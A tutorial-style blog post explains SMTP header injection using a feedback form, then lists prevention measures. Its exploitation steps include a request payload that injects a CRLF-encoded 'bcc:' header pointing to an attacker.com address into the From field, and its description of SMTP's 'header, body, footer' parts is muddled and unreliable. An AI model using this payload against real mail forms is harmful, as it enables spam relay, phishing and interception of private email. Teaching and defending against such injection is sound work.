Just learn and hack

  • RSS
  • Skype
  • Facebook
  • Yahoo

Twitter

What is SMTP Header Injection?

Author hacking-hat - -
Home » » What is SMTP Header Injection?

 SMTP is a Simple Mail Transfer Protocol which handles the sending, receiving, and relaying of email on the server. It contains three main parts that are used in the SMTP header injection later on we will discuss this :

  • Header: In this part of the SMTP normal command ends.
  • Body: Here we try to inject the malicious input.
  • Footer: footer contains all the malicious in input.
SMTP Communication Between Server and User

 

SMTP Header Injection;

SMTP header injection is a technique that is used by attacker to exploit the mail and web servers of the application when the input is not sanitized carefully, it allows the attacker to send emails to other user, the attacker may attach phishing emails, or any dangerous script.  As emails sometimes contains private information that can be a disaster for a company if an unauthorized person can read that information.

For example: An application that uses requests of the following form to submit feedback:

POST feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 56
From=username@gmail.com&Subject=Site+feedback&Message
=love+geeksforgeeks

After submitting the input, the web application to perform an SMTP procedure by using following commands:

MAIL FROM:username@gmail.com
RCPT TO:feedback@geeksforgeeks.com
DATA
From: username@gmail.com
To:feedback@geeksforgeeks.com
Subject:Site feedback
love geeksforgeeks
.

NOTE: The “.” after the message is the end of that particular message.

  • MAIL FROM: It used to set the sender.
  • RCPT TO: This command is containing all the recipient email addresses.
  • DATA: This contains the email data.

Exploiting The STMP Header to Perform SMTP Header Injection:

  • Step 1: Fill the details in the feedback form as show in above example of SMTP.
  • Step 2: Intercept the request that you made by any intercepting tool like Burp Suite.
  • Step 3:  Inject the malicious input in that capture request.

Example:      

POST feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 56
From=username@gmail.com%0d%0a 
bcc:attackername%40attacker.com&Subject=Site+feedback&Message
=love+geeksforgeeks 

Note: “%0a” used for a new line, it is an encoded form of “\n”.

  • Step 4: Now send the injected request as shown in above box.

Prevention:

  • Use white list input validation technique to filter the input.
  • Use regular expression for any new line character, whether it is encoded or not, and block if any new line character found.
  • Always use an email library that will prevent these types of attacks automatically.
  • Take any input as malicious input, you can’t trust any user. Hence, test on every possible input.